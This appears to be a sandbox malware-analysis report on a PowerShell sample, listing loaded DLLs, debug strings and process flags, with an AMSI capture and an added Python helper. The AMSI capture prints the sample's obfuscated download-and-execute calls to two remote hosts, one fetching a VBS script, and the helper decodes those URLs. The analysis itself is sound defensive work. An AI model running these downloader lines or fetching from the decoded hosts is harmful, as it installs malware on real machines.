      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2322019431.0000028B0F862000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2205292098.0000015040265000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2422673623.0000028B29C02000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2322019431.0000028B0F862000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2422673623.0000028B29C52000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbe source: powershell.exe, 00000000.00000002.2422673623.0000028B29C02000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2326344878.0000028B11370000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Target.pdbon.resources source: powershell.exe, 00000000.00000002.2424666019.0000028B29CEA000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000000.00000002.2422673623.0000028B29C52000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32X source: powershell.exe, 00000003.00000002.2204234398.00000150401C7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.2422673623.0000028B29C02000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000000.00000002.2422673623.0000028B29C52000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD34990D6C push eax; ret 3_2_00007FFD34990D6D

      Boot Survival

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'hthviwww.astpw4ntpw4rprispw4s.com.pk/ms/List%20of%20rpw4quirpw4d%20itpw4ms%20and%20spw4rvicpw4s.pdf';getit -fz $flol -oulv 'http://www.blupw4maxxlaspw4r.com/ms/ms.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help use
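
The AMSI buffer above shows the sample's own downloader function, getit, called twice with URLs in which the letter "e" has been replaced by the token "pw4": the encoded file name List%20of%20rpw4quirpw4d%20itpw4ms%20and%20spw4rvicpw4s.pdf is saved under the clear name 'List of Required items and services.pdf' in the same call, which is what gives the scheme away. The Python below is an added analysis helper, not code from the sample or from the Joe Sandbox report. It recovers the substitution by aligning the encoded name with the clear one, decodes both URLs and flags the fetch whose target is a script (ms.vbs), which is the execute half of the download-and-execute behaviour the report detects. The parameter names -fz and -oulv are taken from the captured text; the "hthvi" prefix on the first URL is left as the report shows it, since nothing on the page explains how the script rewrites it; the extension list used for the flag is an assumption.

```python
"""Recover the download targets from the AMSI-captured 'getit' calls.

Added analysis helper (not the sample's code and not part of the Joe
Sandbox report). AMSI_FRAGMENT is a constructed excerpt of the buffer
quoted in the report, trimmed to the two downloader calls.
"""
import difflib
import posixpath
import re
from urllib.parse import unquote, urlsplit

AMSI_FRAGMENT = (
    "getit -fz ($fzf + 'List of Required items and services.pdf') "
    "-oulv 'hthviwww.astpw4ntpw4rprispw4s.com.pk/ms/"
    "List%20of%20rpw4quirpw4d%20itpw4ms%20and%20spw4rvicpw4s.pdf';"
    "getit -fz $flol -oulv 'http://www.blupw4maxxlaspw4r.com/ms/ms.vbs';exit"
)

# One call to the sample's downloader: getit -fz <destination> -oulv '<url>'.
# Parameter names come from the captured text; the destination is either a
# parenthesised expression or a bare variable.
CALL_RE = re.compile(
    r"getit\s+-fz\s+(?P<dest>\([^)]*\)|\$\w+)\s+-oulv\s+'(?P<url>[^']+)'"
)
LITERAL_RE = re.compile(r"'([^']*)'")

# Extensions treated as the "execute" half of download-and-execute.
# Assumption for the heuristic; the report itself only shows a .vbs fetch.
EXECUTABLE_EXTENSIONS = {".vbs", ".js", ".ps1", ".bat", ".cmd", ".hta", ".exe", ".dll"}


def infer_substitution(obfuscated: str, plaintext: str) -> dict:
    """Align an obfuscated string with its plaintext and return the
    token -> letter replacements that turn the former into the latter."""
    a, b = obfuscated.lower(), plaintext.lower()
    mapping = {}
    for tag, i1, i2, j1, j2 in difflib.SequenceMatcher(None, a, b).get_opcodes():
        if tag == "replace":
            mapping.setdefault(a[i1:i2], b[j1:j2])
    return mapping


def recover_mapping(fragment: str) -> dict:
    """Find a call whose destination names the file in clear, pair that name
    with the encoded file name at the end of the URL, and infer the scheme."""
    for call in CALL_RE.finditer(fragment):
        literal = LITERAL_RE.search(call.group("dest"))
        if literal is None:
            continue
        encoded_name = unquote(call.group("url").rsplit("/", 1)[-1])
        return infer_substitution(encoded_name, literal.group(1))
    return {}


def deobfuscate(text: str, mapping: dict) -> str:
    """Apply the recovered token -> letter replacements."""
    for token, plain in mapping.items():
        text = text.replace(token, plain)
    return text


def extract_downloads(fragment: str, mapping: dict) -> list:
    """Decode every downloader call and describe what it fetches."""
    findings = []
    for call in CALL_RE.finditer(fragment):
        url = deobfuscate(call.group("url"), mapping)
        # The first URL carries no scheme (its 'hthvi' prefix is left as the
        # report shows it); parse it scheme-relative so host and path still split.
        parts = urlsplit(url if "://" in url else "//" + url)
        path = unquote(parts.path)
        findings.append({
            "dest": call.group("dest"),
            "url": url,
            "host": parts.hostname,
            "path": path,
            "scheme_ok": parts.scheme in ("http", "https"),
            "executable": posixpath.splitext(path)[1].lower() in EXECUTABLE_EXTENSIONS,
        })
    return findings


if __name__ == "__main__":
    mapping = recover_mapping(AMSI_FRAGMENT)
    print("substitution:", mapping)
    for f in extract_downloads(AMSI_FRAGMENT, mapping):
        kind = "EXECUTE" if f["executable"] else "document"
        print(f"{kind:8} {f['host']:35} {f['path']}  -> {f['dest']}")
```

Run stand-alone it prints the substitution ({'pw4': 'e'}) and the two decoded targets; the flagged one is the .vbs that the report's "Powershell download and execute" rule refers to. The alignment step is what makes the helper reusable: whenever a loader saves a payload under its clear file name while encoding the URL, the two strings together give up the obfuscation without reading the rest of the script.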

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
